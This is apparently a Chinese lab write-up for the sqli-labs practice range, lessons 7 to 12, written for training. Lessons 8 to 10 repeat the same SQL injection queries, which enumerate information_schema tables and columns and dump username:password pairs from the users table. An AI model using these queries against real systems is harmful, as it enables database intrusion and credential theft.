sql注入靶场练习--sqlilabs续写

less-7

1.查询到数据库名

2.查询数据库中的表名

3.查询用户表的列名字

4.查询用户信息

less-8

同理我们是否也可以通过这判断数据库名的对错来注入出想要的结果，由于可见字符皆有可能，我 们发现ascii码更加好比对

注入

查询数据库名：database()

查询表名:select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'

查询字段名 :select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'

查用户信息：select group_concat(username,0x3a,password) from users

less-9

注入

查询数据库名：database()

查询表名:select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'

查询字段名 :select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'

查用户信息：select group_concat(username,0x3a,password) from users

less-10

注入

查询数据库名：database()

查询表名:select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'

查询字段名 :select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'

查用户信息：select group_concat(username,0x3a,password) from users

less-11

确定查询列数为二列

查询到数据库名

查询数据库中的表名

查询用户表的列名字

查询用户信息

less-12

查询到数据库名

查询数据库中的表名

查询用户表的列名字

查询用户信息